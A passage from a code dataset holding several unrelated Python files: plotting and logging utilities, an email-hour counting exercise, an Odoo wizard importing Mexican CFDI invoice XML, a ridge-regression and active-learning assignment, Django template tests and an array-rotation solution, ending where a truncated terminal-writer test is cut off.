plt.xlabel(\"Step of evaluation\")\n plt.ylabel(\"Return\")\n plt.title(\"Mean and variance for return in policy evaluation\")\n if not self.is_remote:\n plt.show()\n plt.savefig(self.save_dir + \"/plots/meanvariance.png\")\n plt.close()\n\n def plot_training_loss_over_time(self):\n plt.figure()\n plt.plot(self.training_V_loss, label=\"V_loss\")\n plt.plot(self.training_pi_loss, label=\"pi_loss\")\n plt.grid = True\n plt.title(\"Loss over policy improvement episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Loss\")\n plt.ylim = 3.0\n plt.legend()\n plt.savefig(self.save_dir + \"/plots/overall.png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n def log_start(self, iteration, start_policy, start_value, start_targets):\n \"\"\"Dump data about the starting game state over a txt file\"\"\"\n\n with open(self.save_dir+\"/targets.txt\", mode=\"a\") as dump:\n dump.write(\"---- Targets at iteration \" + str(iteration) + \" ----\\n\")\n for target in start_targets:\n dump.write(str(target) + '\\n')\n\n dump.write(\"---- Start policy ----\\n\")\n for n in start_policy:\n dump.write(str(n) + \" \")\n dump.write(\"\\n\")\n\n dump.write(\"---- Start value ----\\n\")\n for n in start_value:\n dump.write(str(n) + \" \")\n dump.write(\"\\n\")\n\n dump.close()\n\n @staticmethod\n def save_parameters(params, game):\n mydir = os.path.join(\n os.getcwd(), \"logs\", game,\n datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n try:\n os.makedirs(mydir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"plots\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"numpy_dumps\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"pickled\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n with open(os.path.join(mydir, \"parameters.txt\"), 'w') as d:\n d.write(json.dumps(params))\n\n return mydir, os.path.join(mydir, \"numpy_dumps\"), os.path.join(mydir, \"pickled\")","sub_path":"utils/logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623376181","text":"# 10.2 Write a program to read through the mbox-short.txt and figure out the distribution by hour \r\n# of the day for each of the messages. You can pull the hour out from the 'From ' line by finding \r\n# the time and then splitting the string a second time using a colon.\r\n# From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\r\n# Once you have accumulated the counts for each hour, print out the counts, sorted by hour as shown below.\r\n\r\n###################\r\n#### open file ####\r\n###################\r\nfname = input(\"Enter File:\")\r\nif len(fname) < 1: fname = \"mbox-short.txt\"\r\nhandle = open(fname)\r\n\r\n###################################################\r\n#### perform operations to create a dictionary ####\r\n###################################################\r\ndi = dict()\r\nfor lin in handle:\r\n#### identify lines that start with 'From' ####\r\n if not lin.startswith(\"From\") : continue\r\n lin = lin.rstrip() \r\n spl = lin.split()\r\n if len(spl) < 3: continue\r\n#### split line and subset out the hour ####\r\n spl = spl[5]\r\n spl = spl.split(\":\")\r\n spl = spl[0]\r\n #print(spl)\r\n#### create a dictionary and perform counts ####\r\n if spl in di:\r\n di[spl] = di[spl] + 1\r\n else:\r\n di[spl] = 1\r\n#print(di)\r\n\r\n##################################################\r\n#### Create a tuples from dictionary and sort ####\r\n##################################################\r\ntups = sorted(di.items())\r\n#print(tups)\r\n\r\n###############################################\r\n#### print out according to desired output ####\r\n###############################################\r\nfor (k, v) in tups:\r\n print(k,v)\r\n\r\n\r\n\r\n","sub_path":"2018-10-07 python data structures/46 homework 7.py","file_name":"46 homework 7.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"154548844","text":"# -*- coding: utf-8 -*-\n\nimport base64\nfrom odoo import models, fields, api, tools, _\nimport xlrd\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT, datetime, DEFAULT_SERVER_DATETIME_FORMAT, etree, defaultdict\nfrom xlrd import XLRDError\nimport logging\nfrom lxml.objectify import fromstring\nfrom odoo.addons import decimal_precision as dp\n\nEDI_NAMESPACES = {\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'cfdi': 'http://www.sat.gob.mx/cfd/3',\n 'tfd': 'http://www.sat.gob.mx/TimbreFiscalDigital',\n}\n\n\nclass EdiImportTax(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard.tax'\n\n import_id = fields.Many2one('l10n.mx.edi.import.wizard', required=True)\n\n name = fields.Char('Name')\n amount = fields.Float('Amount', digits=(12, 6))\n amount_rounding = fields.Float('Amount Rounding', digits=(12, 6))\n base = fields.Float('Amount Rounding', digits=(12, 6))\n manual = fields.Boolean('Manual')\n\n tax_id = fields.Many2one('account.tax', 'Tax')\n account_id = fields.Many2one('account.account', 'Account')\n company_id = fields.Many2one('res.company', 'Company')\n currency_id = fields.Many2one('res.currency', 'Currency')\n\n\nclass EdiImportLine(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard.line'\n\n import_id = fields.Many2one('l10n.mx.edi.import.wizard', required=True)\n account_analytic_id = fields.Many2one('account.analytic.account', 'Analytic Account')\n uom_code = fields.Char('Unit of Measure')\n product_code = fields.Char('Product Code')\n l10n_mx_edi_code_sat = fields.Char('SAT Code')\n has_product = fields.Boolean()\n\n product_id = fields.Many2one('product.product', 'Product', compute='_compute_product', store=True)\n product_description = fields.Char('Description')\n\n currency_id = fields.Many2one('res.currency', 'Currency')\n\n price_unit = fields.Float('Unit Price', digits=(12, 6))\n price_subtotal = fields.Float('Price', digits=(12, 6))\n price_total = fields.Float('Price', digits=(12, 6))\n total_taxes = fields.Float('Total Taxes', digits=(12, 6))\n quantity = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'), default=1)\n discount = fields.Float('Discount', digits=(12, 6))\n\n invoice_line_tax_ids = fields.Many2many('account.tax',\n 'l10n_mx_edi_import_wizard_line_tax_rel', 'invoice_line_id', 'tax_id',\n string='Taxes')\n\n def product_lookup(self):\n if self.product_code:\n product = self.env['product.product'].search([('default_code', '=', self.product_code)])\n\n return product\n\n return False\n\n @api.model\n def create(self, values):\n item = super().create(values)\n item._compute_product()\n return item\n\n @api.one\n def _compute_product(self):\n product = self.product_lookup()\n\n self.has_product = product and product.id is not False\n\n if self.has_product:\n self.product_id = product.id\n\n\ndef get_xml_value(xml, selector, key):\n if selector:\n el = xml.find(selector, EDI_NAMESPACES)\n if el:\n return el.get(key.lower(), el.get(key.capitalize()))\n else:\n xml.get(key.lower(), xml.get(key.capitalize()))\n\n\nclass EdiImport(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard'\n\n xml_file = fields.Binary(required=True)\n xml_content = fields.Text(readonly=True)\n name = fields.Char('Folio')\n\n version = fields.Char()\n\n l10n_mx_edi_usage = fields.Selection([\n ('G01', 'Acquisition of merchandise'),\n ('G02', 'Returns, discounts or bonuses'),\n ('G03', 'General expenses'),\n ('I01', 'Constructions'),\n ('I02', 'Office furniture and equipment investment'),\n ('I03', 'Transportation equipment'),\n ('I04', 'Computer equipment and accessories'),\n ('I05', 'Dices, dies, molds, matrices and tooling'),\n ('I06', 'Telephone communications'),\n ('I07', 'Satellite communications'),\n ('I08', 'Other machinery and equipment'),\n ('D01', 'Medical, dental and hospital expenses.'),\n ('D02', 'Medical expenses for disability'),\n ('D03', 'Funeral expenses'),\n ('D04', 'Donations'),\n ('D05', 'Real interest effectively paid for mortgage loans (room house)'),\n ('D06', 'Voluntary contributions to SAR'),\n ('D07', 'Medical insurance premiums'),\n ('D08', 'Mandatory School Transportation Expenses'),\n ('D09', 'Deposits in savings accounts, premiums based on pension plans.'),\n ('D10', 'Payments for educational services (Colegiatura)'),\n ('P01', 'To define'),\n ], 'Usage', default='P01',\n help='Used in CFDI 3.3 to express the key to the usage that will '\n 'gives the receiver to this invoice. This value is defined by the '\n 'customer. \\nNote: It is not cause for cancellation if the key set is '\n 'not the usage that will give the receiver of the document.')\n\n l10n_mx_edi_pac_status = fields.Char(default='to_sign')\n l10n_mx_edi_sat_status = fields.Char(default='none')\n l10n_mx_edi_cfdi_name = fields.Char()\n l10n_mx_edi_cfdi_uuid = fields.Char('UUID')\n l10n_mx_edi_cfdi = fields.Char(\"CFDI\")\n l10n_mx_edi_cfdi_supplier_rfc = fields.Char('RFC')\n l10n_mx_edi_cfdi_supplier_name = fields.Char('Name')\n l10n_mx_edi_cfdi_customer_rfc = fields.Char('RFC')\n l10n_mx_edi_cfdi_customer_name = fields.Char('Name')\n l10n_mx_edi_cfdi_amount = fields.Float('Amount', digits=(10, 2))\n currency_code = fields.Char('Currency Code')\n currency_id = fields.Many2one('res.currency', 'Currency', compute='_compute_edi_values', store=True)\n exchange_rate = fields.Float(string='Current Rate', digits=(12, 6))\n company_id = fields.Many2one('res.partner', 'Company', compute='_compute_edi_values', store=True)\n partner_id = fields.Many2one('res.partner', 'Client', compute='_compute_edi_values', store=True)\n partner_shipping_id = fields.Many2one('res.partner', string='Delivery Address', compute='_compute_edi_values', store=True)\n state = fields.Char(\"State\")\n date_invoice = fields.Datetime()\n payment_term_name = fields.Char(\"Payement Term\", size=255)\n has_payment_term = fields.Boolean()\n payment_term_id = fields.Many2one('account.payment.term', 'Payment Term', compute='_compute_edi_values', store=True)\n l10n_mx_edi_cfdi_certificate_id = fields.Char()\n invoice_id = fields.Many2one('account.invoice', 'Invoice')\n fiscal_position_code = fields.Char('Fiscal Position Code')\n fiscal_position_id = fields.Many2one('account.fiscal.position', 'Fiscal Position', compute='_compute_edi_values', store=True)\n\n amount_untaxed = fields.Float(string='Untaxed Amount', store=True, readonly=True, digits=(12, 6))\n amount_tax = fields.Float(string='Taxes', store=True, readonly=True, digits=(12, 6))\n amount_total = fields.Float(string='Total', store=True, readonly=True, digits=(12, 6))\n\n line_ids = fields.One2many('l10n.mx.edi.import.wizard.line', 'import_id', 'Lines')\n tax_line_ids = fields.One2many('l10n.mx.edi.import.wizard.tax', 'import_id', 'Tax Lines')\n\n @api.multi\n @api.depends('currency_code', 'payment_term_name', 'fiscal_position_code', 'l10n_mx_edi_cfdi_supplier_rfc', 'l10n_mx_edi_cfdi_customer_rfc')\n def _compute_edi_values(self):\n self.ensure_one()\n if self.fiscal_position_code:\n fiscal_position = self.env['account.fiscal.position'].search(\n [('l10n_mx_edi_code', '=', self.fiscal_position_code)], limit=1)\n self.fiscal_position_id = fiscal_position.id or False\n\n if self.payment_term_name:\n payment_term = self.env['account.payment.term'].search(\n [('name', '=', self.payment_term_name)], limit=1)\n self.payment_term_id = payment_term.id or False\n self.has_payment_term = payment_term.id is not False\n\n if self.currency_code:\n self.currency_id = self.env['res.currency'].search([('name', '=', self.currency_code)]).id\n else:\n self.currency_id = False\n\n if self.l10n_mx_edi_cfdi_supplier_rfc:\n supplier = self.env['res.partner'].search([('vat', '=', self.l10n_mx_edi_cfdi_supplier_rfc)], limit=1)\n\n self.company_id = supplier.company_id.id if supplier.id else False\n else:\n self.company_id = False\n\n if self.l10n_mx_edi_cfdi_customer_rfc:\n supplier = self.env['res.partner'].search([('vat', '=', self.l10n_mx_edi_cfdi_customer_rfc)], limit=1)\n\n self.partner_id = supplier.id or False\n\n if self.partner_id:\n addr = self.partner_id.address_get(['delivery'])\n self.partner_shipping_id = addr and addr.get('delivery')\n else:\n self.partner_id = False\n\n @api.multi\n def action_validate(self):\n\n if self.process_xml_file():\n preview_form = self.env.ref('l10n_mx_edi_import.l10n_mx_edi_import_wizard_preview_form')\n\n return {\n 'name': _('Preview Data'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': self.id,\n 'res_model': self._name,\n 'views': [(preview_form.id, 'form')],\n 'view_id': preview_form.id,\n 'target': 'new',\n }\n\n @api.multi\n def action_upload(self):\n upload_form = self.env.ref('l10n_mx_edi_import.l10n_mx_edi_import_wizard_form')\n\n return {\n 'name': _('Preview Data'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self._name,\n 'views': [(upload_form.id, 'form')],\n 'view_id': upload_form.id,\n 'target': 'new',\n }\n\n def validate_import(self):\n invalid = filter(lambda p: not p.product_id, self.line_ids)\n\n if len(list(invalid)):\n raise UserError(\n _('Some invoice lines doesnt have a valid product. Please update or upload another XML file.'))\n\n return True\n\n def get_invoice_tax_line_values_from_tax_line(self, line):\n\n return {\n 'name': line.name,\n 'tax_id': line.tax_id.id,\n 'account_id': line.account_id.id,\n 'company_id': line.company_id.id,\n 'currency_id': line.currency_id.id,\n 'amount': line.amount,\n 'amount_rounding': line.amount_rounding,\n 'base': line.base,\n 'manual': line.manual,\n }\n\n def get_invoice_line_values_from_line(self, line):\n ir_property_obj = self.env['ir.property']\n\n account_id = False\n if line.product_id.id:\n account_id = line.product_id.property_account_income_id.id\n\n if not account_id:\n inc_acc = ir_property_obj.get('property_account_income_categ_id', 'product.category')\n account_id = self.fiscal_position_id.map_account(inc_acc).id if inc_acc else False\n\n if not account_id:\n raise UserError(\n _(\n 'There is no income account defined for this product: \"%s\". You may have to install a chart of account from Accounting app, settings menu.') %\n (line.product_id.name,))\n\n return {\n 'name': line.product_description,\n 'price_unit': line.price_unit,\n 'price_subtotal': line.price_subtotal,\n 'price_subtotal_signed': line.price_subtotal,\n 'price_total': line.price_total,\n 'discount': line.discount,\n 'quantity': line.quantity,\n 'product_id': line.product_id.id,\n 'uom_id': line.product_id.uom_id.id,\n 'account_id': account_id,\n 'account_analytic_id': line.account_analytic_id.id,\n 'invoice_line_tax_ids': [(6, 0, [tax.id for tax in line.invoice_line_tax_ids])],\n }\n\n def get_invoice_creation_values(self):\n invoice_lines = []\n\n amount_untaxed = 0\n amount_untaxed_signed = 0\n amount_tax = 0\n amount_total = 0\n amount_total_signed = 0\n amount_total_company_signed = 0\n\n for line in self.line_ids:\n invoice_lines.append((0, 0, self.get_invoice_line_values_from_line(line)))\n\n amount_untaxed += line.price_subtotal\n amount_untaxed_signed += line.price_subtotal\n amount_tax += line.total_taxes\n amount_total_signed += line.price_subtotal + line.total_taxes\n amount_total_company_signed += line.price_subtotal + line.total_taxes\n\n amount_total = amount_untaxed + self.amount_tax\n\n tax_lines = []\n for line in self.tax_line_ids:\n tax_lines.append((0, 0, self.get_invoice_tax_line_values_from_tax_line(line)))\n\n return {\n 'type': 'out_invoice',\n 'state': 'draft',\n 'reference': False,\n 'move_name': \"F-/{name}\".format(name=self.name),\n 'number': \"F-/{name}\".format(name=self.name),\n 'date_invoice': self.date_invoice,\n 'partner_shipping_id': self.partner_shipping_id.id,\n 'l10n_mx_edi_usage': self.l10n_mx_edi_usage,\n 'l10n_mx_edi_pac_status': self.l10n_mx_edi_pac_status,\n 'l10n_mx_edi_sat_status': self.l10n_mx_edi_sat_status,\n 'l10n_mx_edi_cfdi_supplier_rfc': self.l10n_mx_edi_cfdi_supplier_rfc,\n 'l10n_mx_edi_cfdi_customer_rfc': self.l10n_mx_edi_cfdi_customer_rfc,\n 'account_id': self.partner_id.property_account_receivable_id.id,\n 'partner_id': self.partner_id.id,\n 'invoice_line_ids': invoice_lines,\n 'tax_line_ids': tax_lines,\n 'currency_id': self.currency_id.id,\n 'payment_term_id': self.payment_term_id.id,\n 'fiscal_position_id': self.fiscal_position_id.id if self.fiscal_position_id else self.partner_id.property_account_position_id.id,\n 'user_id': self.env.user.id,\n 'comment': '',\n\n 'amount_untaxed': amount_untaxed,\n 'amount_untaxed_signed': amount_untaxed_signed,\n 'amount_tax': self.amount_tax or amount_tax,\n 'amount_total': amount_total,\n 'amount_total_signed': amount_total_signed,\n 'amount_total_company_signed': amount_total_company_signed,\n }\n\n def create_invoice(self):\n inv_obj = self.env['account.invoice']\n invoice = inv_obj.create(self.get_invoice_creation_values())\n\n filename = ('%s-%s-MX-Invoice-%s.xml' % (\n invoice.journal_id.code, invoice.number, self.version.replace('.', '-'))).replace('/', '')\n ctx = self.env.context.copy()\n ctx.pop('default_type', False)\n invoice.l10n_mx_edi_cfdi_name = filename\n\n attachment_id = self.env['ir.attachment'].with_context(ctx).create({\n 'name': filename,\n 'res_id': invoice.id,\n 'res_model': invoice._name,\n 'datas': self.xml_file,\n 'datas_fname': filename,\n 'description': 'Mexican invoice',\n })\n\n self.invoice_id = invoice.id\n\n invoice.action_invoice_open()\n\n return invoice\n\n @api.multi\n def action_import(self):\n # create invoice here\n\n if self.validate_import():\n\n self.create_invoice()\n\n return self.do_finish_action()\n\n def do_finish_action(self):\n if self.invoice_id.id or True:\n action = self.env.ref('account.action_invoice_tree1').read()[0]\n\n action['views'] = [(self.env.ref('account.invoice_form').id, 'form')]\n action['res_id'] = self.invoice_id.id\n else:\n action = {'type': 'ir.actions.act_window_close'}\n return action\n\n @api.multi\n def process_xml_file(self):\n try:\n xml = fromstring(base64.b64decode(self.xml_file))\n self.xml_content = etree.tostring(xml, pretty_print=True)\n except:\n raise ValidationError('Unable to parse XML file')\n\n self.version = xml.attrib.get('Version')\n self.name = xml.attrib.get('Folio')\n self.date_invoice = datetime.strptime(xml.attrib.get('Fecha'), '%Y-%m-%dT%H:%M:%S') if xml.attrib.get('Fecha') else False\n self.currency_code = xml.attrib.get('Moneda')\n self.exchange_rate = xml.attrib.get('TipoCambio', 1)\n self.l10n_mx_edi_cfdi_amount = float(xml.attrib.get('Total', xml.attrib.get('total', 0)))\n\n self.amount_untaxed = float(xml.attrib.get('SubTotal', xml.attrib.get('subTotal', 0)))\n self.amount_total = float(xml.attrib.get('Total', xml.attrib.get('total', 0)))\n\n taxes_section = getattr(xml, 'Impuestos', False)\n if taxes_section:\n self.amount_tax = float(taxes_section.attrib.get('TotalImpuestosTrasladados', 0))\n\n self.payment_term_name = xml.attrib.get('CondicionesDePago') or ''\n\n self.l10n_mx_edi_cfdi_supplier_name = xml.Emisor.attrib.get('Nombre', xml.Emisor.attrib.get('nombre'))\n self.l10n_mx_edi_cfdi_supplier_rfc = xml.Emisor.attrib.get('Rfc', xml.Emisor.attrib.get('rfc'))\n self.l10n_mx_edi_cfdi_customer_name = xml.Receptor.attrib.get('Nombre', xml.Receptor.attrib.get('nombre'))\n self.l10n_mx_edi_cfdi_customer_rfc = xml.Receptor.attrib.get('Rfc', xml.Receptor.attrib.get('rfc'))\n self.l10n_mx_edi_usage = xml.Receptor.attrib.get('UsoCFDI')\n\n if not self.company_id:\n raise UserError(\n _('Unable to find company %s with RFC %s') % (\n self.l10n_mx_edi_cfdi_supplier_name, self.l10n_mx_edi_cfdi_supplier_rfc))\n\n if self.company_id.id != self.env.user.partner_id.company_id.id:\n raise UserError(\n _('Unable to process XML from company other than \"%s\" with RFC \"%s\". Invoice RFC: \"%s\".') % (\n self.env.user.partner_id.company_id.name, self.env.user.partner_id.company_id.vat, self.company_id.vat))\n\n if not self.partner_id:\n raise UserError(\n _('Unable to find client \"%s\" with RFC \"%s\".') % (\n self.l10n_mx_edi_cfdi_customer_name, self.l10n_mx_edi_cfdi_customer_rfc))\n\n complemento_section = getattr(xml, 'Complemento', False)\n\n timbre = complemento_section.find('tfd:TimbreFiscalDigital', EDI_NAMESPACES) if complemento_section else False\n\n if timbre is not None:\n self.l10n_mx_edi_cfdi_uuid = timbre.get('UUID')\n\n if self.l10n_mx_edi_cfdi_uuid:\n self.l10n_mx_edi_pac_status = 'signed'\n self.l10n_mx_edi_sat_status = 'valid'\n\n concepts_section = getattr(xml, 'Conceptos', False)\n\n if concepts_section:\n\n taxes = {}\n\n lines = []\n for i in range(concepts_section.countchildren()):\n item = concepts_section.Concepto[i]\n line = self._get_invoice_line_from_xml(item)\n\n tax_info = line.pop('tax_lines')\n\n for tline in tax_info:\n tax_item = tline['tax']\n\n if tax_item.id not in taxes:\n taxes[tax_item.id] = {\n 'name': tax_item.name,\n 'tax_id': tax_item.id,\n 'account_id': tax_item.account_id.id,\n 'currency_id': self.currency_id,\n 'company_id': self.env.user.partner_id.company_id.id,\n 'amount': tline['amount'],\n 'base': self.amount_untaxed,\n 'manual': True,\n }\n else:\n taxes[tline['tax'].id]['amount'] += tline['amount']\n\n lines.append((0, 0, line))\n\n self.line_ids = lines\n self.tax_line_ids = [(0, 0, item) for item in taxes.values()]\n\n return True\n\n def _get_invoice_line_from_xml(self, item):\n AccountTax = self.env['account.tax']\n\n tax_ids = []\n taxes = []\n total_taxes = 0\n if self.version == '3.3':\n if hasattr(item, 'Impuestos'):\n if hasattr(item.Impuestos, 'Traslados'):\n for tIndex in range(item.Impuestos.Traslados.countchildren()):\n\n concept_tax_section = getattr(item, 'Impuestos')\n\n if concept_tax_section:\n tax = concept_tax_section.Traslados.Traslado[0]\n if tax.attrib.get('TasaOCuota'):\n\n tasa = float(tax.attrib['TasaOCuota']) * 100\n amount = float(tax.attrib.get('Importe', 0))\n total_taxes += amount\n\n tax_item = AccountTax.search([('amount', '=', tasa), ('type_tax_use', '=', 'sale')], limit=1)\n\n if tax_item.id:\n tax_ids.append(tax_item.id)\n\n taxes.append({\n 'type': 'tax',\n 'item': item,\n 'tax': tax_item,\n 'amount': amount\n })\n else:\n raise UserError(\n _(\n 'Unable to find tax for %s %%') % ( tasa,))\n\n if hasattr(item.Impuestos, 'Retenciones'):\n for tIndex in range(item.Impuestos.Retenciones.countchildren()):\n\n concept_tax_section = getattr(item, 'Impuestos')\n\n if concept_tax_section:\n tax = concept_tax_section.Retenciones.Retencion[0]\n if tax.attrib.get('TasaOCuota'):\n\n tasa = float(tax.attrib['TasaOCuota']) * 100\n amount = float(tax.attrib.get('Importe', 0))\n total_taxes += amount\n\n tax_item = AccountTax.search([('amount', '=', -tasa), ('type_tax_use', '=', 'sale')],\n limit=1)\n\n if tax_item.id:\n tax_ids.append(tax_item.id)\n\n taxes.append({\n 'type': 'retention',\n 'item': item,\n 'tax': tax_item,\n 'amount': -amount\n })\n else:\n raise UserError(\n _(\n 'Unable to find retention for %s %%') % ( tasa,))\n\n price_subtotal = float(item.attrib.get('Importe', item.attrib.get('importe', 0)))\n quantity = float(item.attrib.get('Cantidad', item.attrib.get('cantidad', 0)))\n price_unit = float(item.attrib.get('ValorUnitario', item.attrib.get('valorUnitario', 0)))\n\n line = {\n 'import_id': self.id,\n 'uom_code': item.attrib.get('ClaveUnidad', item.attrib.get('Unidad')),\n 'l10n_mx_edi_code_sat': item.attrib.get('ClaveProdServ'),\n 'product_code': item.attrib.get('NoIdentificacion'),\n 'quantity': quantity,\n 'price_unit': price_unit,\n 'price_subtotal': price_subtotal,\n 'price_total': price_subtotal + total_taxes,\n 'total_taxes': total_taxes,\n 'currency_id': self.currency_id,\n 'tax_lines': taxes,\n 'discount': 0,\n 'product_description': item.attrib.get('Descripcion', item.attrib.get('descripcion', False)),\n 'invoice_line_tax_ids': [(6, 0, tax_ids)],\n }\n\n return line\n","sub_path":"l10n_mx_edi_import/wizard/l10n_mx_edi_import_wizard.py","file_name":"l10n_mx_edi_import_wizard.py","file_ext":"py","file_size_in_byte":24322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"41979664","text":"\nimport csv \nimport sys\nimport numpy as np\nnp.set_printoptions(precision=15)\n\n# Not utilised\n#def normalizeData(data):\n# mean = data[:,0:-1].mean(axis=0)\n# std = data[:,0:-1].std(axis=0)\n# data[:,0:-1] = data[:,0:-1] - mean[None,:]\n# data[:,0:-1] = data[:,0:-1]/std[None,:]\n# \n#def normalizeLabel(label):\n# mean = label.mean(axis=0)\n# label = label - mean\n \ndef part1(lambdaNum, varNum, data, label):\n #Lecture 3, Slide 16\n dim = data.shape[1]\n temp1 = lambdaNum*np.eye(dim) + (data.T).dot(data)\n wRR = (np.linalg.inv(temp1)).dot((data.T).dot(label))\n \n return wRR\n \ndef updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr):\n #Lecture 5, Slide 16\n oldAutoCorr = (data.T).dot(data) + oldAutoCorr\n oldCrossCorr = (data.T).dot(label) + oldCrossCorr\n\n covInv = lambdaNum*np.eye(dim) + (1/varNum)*oldAutoCorr\n cov = np.linalg.inv(covInv)\n \n temp1 = lambdaNum*varNum*np.eye(dim) + oldAutoCorr\n mean = (np.linalg.inv(temp1)).dot(oldCrossCorr)\n\n return cov, mean, oldAutoCorr, oldCrossCorr\n \ndef part2(lambdaNum, varNum, data, label, dataTest): \n dim = data.shape[1]\n active = []\n oldAutoCorr = np.zeros((dim,dim))\n oldCrossCorr = np.zeros(dim)\n\n cov, mean, oldAutoCorr, oldCrossCorr = updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr)\n #Lecture 5, slide 9\n wRR = mean\n \n #1-based indexes\n indices = list(range(dataTest.shape[0]))\n for i in range(0,10):\n #Lecture 5, Slide 18\n varMatrix = (dataTest.dot(cov)).dot(dataTest.T)\n row = np.argmax(varMatrix.diagonal())\n data = dataTest[row,:]\n# print(varMatrix[row,row])\n #Lecture 5, slide 12\n label = data.dot(wRR) \n #Build active learning sequence\n actualRow = indices[row]\n active.append(actualRow)\n #Remove x0 and corresponding index\n dataTest = np.delete(dataTest,(row),axis=0)\n indices.pop(row)\n #Update posterior distribution\n cov, mean, oldAutoCorr, oldCrossCorr = updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr)\n \n #Lecture 5, slide 9\n wRR = mean\n\n #1-based indexes to pass Vocareum \n active = [j+1 for j in active] \n return active\n \ndef main(): \n lambdaNum = float(sys.argv[1])\n varNum = float(sys.argv[2])\n file_X_train = np.genfromtxt(sys.argv[3], delimiter=',')\n file_y_train = np.genfromtxt(sys.argv[4], delimiter=',')\n file_X_test = np.genfromtxt(sys.argv[5], delimiter=',')\n \n #Normalize data and label\n# normalizeData(file_X_train)\n# normalizeLabel(file_y_train)\n# normalizeData(file_X_test)\n\n #Compute wRR for part 1\n wRR = part1(lambdaNum, varNum, file_X_train, file_y_train)\n# print(wRR)\n \n #Compute active learning sequence for part 2\n active = part2(lambdaNum, varNum, file_X_train, file_y_train, file_X_test.copy())\n# print(active)\n \n #Write output to file\n path1 = \"wRR_{:g}.csv\".format(lambdaNum)\n path2 = \"active_{:g}_{:g}.csv\".format(lambdaNum,varNum)\n with open(path1, \"w\") as file:\n writer = csv.writer(file, delimiter=',', lineterminator='\\n')\n for val in wRR:\n writer.writerow([val])\n \n with open(path2, \"w\") as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerow(active)\n \nif __name__ == \"__main__\":\n main()","sub_path":"Columbia/Projects/Week 3 Linear Regression/0hw1_regression.py","file_name":"0hw1_regression.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"541798244","text":"from django.conf import settings\nfrom django.template.loader import render_to_string\n\nimport pytest\n\n\ndef test_company_with_logo():\n context = {\n 'company': {'logo': 'logo.png'},\n }\n html = render_to_string('fab/is-fab-user.html', context)\n\n assert 'logo.png' in html\n assert 'logo-placeholder.png' not in html\n\n\ndef test_company_without_logo():\n context = {\n 'company': {'logo': None},\n }\n html = render_to_string('fab/is-fab-user.html', context)\n assert 'company-logo-placeholder' in html\n\n\n@pytest.mark.parametrize('is_profile_ownerm, url,count', (\n (True, settings.FAB_ADD_USER_URL, 1),\n (True, settings.FAB_REMOVE_USER_URL, 1),\n (True, settings.FAB_TRANSFER_ACCOUNT_URL, 1),\n (False, settings.FAB_ADD_USER_URL, 0),\n (False, settings.FAB_REMOVE_USER_URL, 0),\n (False, settings.FAB_TRANSFER_ACCOUNT_URL, 0),\n))\ndef test_multi_user_is_owner(is_profile_ownerm, url, count, settings):\n context = {\n 'FAB_ADD_USER_URL': settings.FAB_ADD_USER_URL,\n 'FAB_REMOVE_USER_URL': settings.FAB_REMOVE_USER_URL,\n 'FAB_TRANSFER_ACCOUNT_URL': settings.FAB_TRANSFER_ACCOUNT_URL,\n 'is_profile_owner': is_profile_ownerm,\n }\n\n html = render_to_string('fab/is-fab-user.html', context)\n assert html.count(str(url)) == count\n","sub_path":"profile/fab/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419772012","text":"class Solution:\n\n def reverse(self, start, end, nums):\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n\n n = len(nums)\n k %= n\n\n self.reverse(n - k, n - 1, nums)\n self.reverse(0, n - k - 1, nums)\n self.reverse(0, n - 1, nums)\n\n# while k:\n\n# last = nums[-1]\n\n# for index in range(len(nums)-1, 0, -1):\n\n# nums[index] = nums[index-1]\n\n# nums[0] = last\n# k -= 1\n\n\n# temp = nums[:]\n# n = len(nums)\n\n# for index, value in enumerate(temp):\n\n# nums[(index + k) % n] = value\n","sub_path":"189_Rotate_Array.py","file_name":"189_Rotate_Array.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271378238","text":"import py\nimport os\nfrom py.__.io import terminalwriter \n\ndef test_terminalwriter_computes_width():\n py.magic.patch(terminalwriter, 'get_terminal_width', lambda: 42)\n try:\n tw = py.io.TerminalWriter() \n assert tw.fullwidth == 42\n 